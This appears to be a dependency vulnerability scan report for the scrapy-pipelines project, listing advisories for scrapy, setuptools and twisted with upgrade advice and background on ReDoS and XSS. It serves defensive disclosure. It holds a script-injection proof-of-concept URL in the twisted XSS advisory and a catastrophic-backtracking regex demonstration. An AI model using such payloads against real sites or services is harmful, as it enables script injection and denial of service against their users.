Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1Remediation: Upgrade to scrapy@2.11.2.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Exposure of Sensitive Information to an Unauthorized Actor due to improper handling of HTTP headers during cross-origin redirects. An attacker can intercept the Authorization header and potentially access sensitive information by exploiting this misconfiguration in redirect scenarios where the domain remains the same but the scheme or port changes.
Note: In the context of a man-in-the-middle attack, this could be used to get access to the value of that Authorization header.
Remediation
Upgrade Scrapy to version 2.11.2 or higher.
References
medium severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1Remediation: Upgrade to scrapy@2.6.0.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Information Exposure in which a spider could leak cookie headers when being forwarded to a third party, potentially attacker-controlled website.
Remediation
Upgrade Scrapy to version 2.6.0 or higher.
References
medium severity
- Vulnerable module: setuptools
- Introduced through: scrapy@2.4.1 and txmongo@19.2.0
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › zope.interface@6.4.post2 › setuptools@40.5.0Remediation: Upgrade to scrapy@2.10.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › twisted@23.8.0 › zope.interface@6.4.post2 › setuptools@40.5.0Remediation: Upgrade to scrapy@2.4.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › txmongo@19.2.0 › twisted@23.8.0 › zope.interface@6.4.post2 › setuptools@40.5.0Remediation: Upgrade to txmongo@24.0.0.
Overview
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via crafted HTML package or custom PackageIndex page.
Note:
Only a small portion of the user base is impacted by this flaw. Setuptools maintainers pointed out that package_index is deprecated (not formally, but “in spirit”) and the vulnerability isn't reachable through standard, recommended workflows.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade setuptools to version 65.5.1 or higher.
References
medium severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1Remediation: Upgrade to scrapy@2.5.1.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Information Exposure. If you use HttpAuthMiddleware (i.e. the http_user and http_pass spider attributes) for HTTP authentication, all requests will expose your credentials to the request target. This includes requests generated by Scrapy components, such as robots.txt requests sent by Scrapy when the ROBOTSTXT_OBEY setting is set to True, or as requests reached through redirects.
Remediation
Upgrade Scrapy to version 2.5.1, 1.8.1 or higher.
References
medium severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1Remediation: Upgrade to scrapy@2.6.2.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to Credential Exposure via the process_request() function in downloadermiddlewares/httpproxy.py. A proxy can leak credentials to another proxy if third-party downloader middlewares leave Proxy-Authentication headers unchanged when updating proxy metadata for a new request.
NOTE: To fully mitigate the effects of vulnerability, replacing or upgrading the third-party downloader middleware might be necessary after upgrading.
Remediation
Upgrade Scrapy to version 1.8.3, 2.6.2 or higher.
References
medium severity
- Vulnerable module: twisted
- Introduced through: scrapy@2.4.1 and txmongo@19.2.0
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › twisted@23.8.0Remediation: Upgrade to scrapy@2.4.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › txmongo@19.2.0 › twisted@23.8.0Remediation: Upgrade to txmongo@24.0.0.
Overview
Twisted is an event-based network programming and multi-protocol integration framework.
Affected versions of this package are vulnerable to HTTP Response Smuggling. When sending multiple HTTP/1.1 requests in one TCP segment, twisted.web does not guarantee the response order. An attacker in control of an endpoint can manipulate a different user's second response to a pipelined chunked request by delaying the response to their own request.
Workaround
This vulnerability can be avoided by enforcing HTTP/2, as it is only vulnerable for HTTP/1.x traffic.
Remediation
Upgrade Twisted to version 23.10.0rc1 or higher.
References
medium severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1
Overview
via S3FilesStore. Files are stored in memory before uploaded to s3, increasing memory usage if giant or many files are being uploaded at the same time.
References
medium severity
- Vulnerable module: twisted
- Introduced through: scrapy@2.4.1 and txmongo@19.2.0
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1 › twisted@23.8.0Remediation: Upgrade to scrapy@2.4.1.
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › txmongo@19.2.0 › twisted@23.8.0Remediation: Upgrade to txmongo@24.0.0.
Overview
Twisted is an event-based network programming and multi-protocol integration framework.
Affected versions of this package are vulnerable to Cross-site Scripting (XSS) when the victim is using Firefox, due to an unescaped URL in the redirectTo() function. A site which is vulnerable to open redirects by other means can be can be made to execute scripts injected into a redirect URL.
PoC
http://127.0.0.1:9009?url=ws://example.com/"><script>alert(document.location)</script>
Details
Cross-site scripting (or XSS) is a code vulnerability that occurs when an attacker “injects” a malicious script into an otherwise trusted website. The injected script gets downloaded and executed by the end user’s browser when the user interacts with the compromised website.
This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.
Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.
Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as < and > can be coded as > in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.
The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.
Types of attacks
There are a few methods by which XSS can be manipulated:
| Type | Origin | Description |
|---|---|---|
| Stored | Server | The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link. |
| Reflected | Server | The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser. |
| DOM-based | Client | The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data. |
| Mutated | The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters. |
Affected environments
The following environments are susceptible to an XSS attack:
- Web servers
- Application servers
- Web application environments
How to prevent
This section describes the top best practices designed to specifically protect your code:
- Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
- Convert special characters such as
?,&,/,<,>and spaces to their respective HTML or URL encoded equivalents. - Give users the option to disable client-side scripts.
- Redirect invalid requests.
- Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
- Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
- Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.
Remediation
Upgrade Twisted to version 24.7.0rc1 or higher.
References
medium severity
- Vulnerable module: scrapy
- Introduced through: scrapy@2.4.1
Detailed paths
-
Introduced through: scrapedia/scrapy-pipelines@scrapedia/scrapy-pipelines#667b87c8ff490e87d95d03ca0aaa715b9ceda47d › scrapy@2.4.1Remediation: Upgrade to scrapy@2.11.2.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to URL Redirection to Untrusted Site ('Open Redirect') due to the improper handling of scheme-specific proxy settings during HTTP redirects. An attacker can potentially intercept sensitive information by exploiting the failure to switch proxies when redirected from HTTP to HTTPS URLs or vice versa.
Remediation
Upgrade Scrapy to version 2.11.2 or higher.